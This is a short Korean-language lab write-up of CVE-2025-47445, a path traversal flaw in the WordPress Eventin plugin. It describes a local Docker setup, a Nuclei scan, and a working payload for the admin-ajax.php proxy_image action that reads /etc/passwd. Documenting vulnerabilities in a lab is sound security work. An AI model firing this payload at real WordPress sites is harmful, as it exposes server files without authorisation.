
# CVE-2025-47445 개념 증명 익스플로잇 WordPress Eventin 플러그인의 경로 탐색(path traversal) 취약점인 CVE-2025-47445에 대한 개념 증명 익스플로잇입니다. 로컬 Docker 환경 설정 지침과 수동 익스플로잇 단계를 포함합니다.
| 정보 |
|---|
| WordPress 플러그인: | Wordpress Eventin |
| 플러그인 버전: | 4.0.26 (또는 그 이하) |
| CVE 정보: | Project Discovery - Vulnerability library |
| CVEdetails.com | |
| 관심 도구: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
Worfence Docker WordPress Research Lab은 서로 다른 두 가지 환경을 제공하며, 하나는 이전 버전의 PHP를 사용합니다. 우리는 최신 환경을 선택하겠습니다.
# In the dockerwp84 folder
docker-compose build
docker-compose up -d
그 후 localhost:1337을 통해 WordPress 페이지를 설정했습니다. 플러그인 스토어에서 Eventin 플러그인, 특히 4.0.26 버전을 다운로드하고 WordPress 인터페이스를 통해 설치 및 활성화했습니다.
이제 모든 준비가 끝났습니다.
찾고 있는 CVE를 Nuclei가 발견할 수 있는지 확인하고 싶어서 임시 Docker 컨테이너를 통해 인스턴스를 실행했습니다.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
Nuclei를 여러 번 실행해 보았고 결과가 다르게 나왔습니다. 이유는 확실하지 않습니다. 하지만 결국 CVE와 특별히 찾고 있지 않던 몇 가지 다른 항목을 발견했습니다.

/etc/passwd 파일에 접근할 수 있는지 확인하기 위해 GET 요청에 다음 페이로드를 입력했습니다.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
그리고 성공했습니다.

이 작업은 교육 목적으로 수행되었습니다.
모든 소프트웨어를 업데이트하세요. 매일 새로운 CVE가 발견됩니다.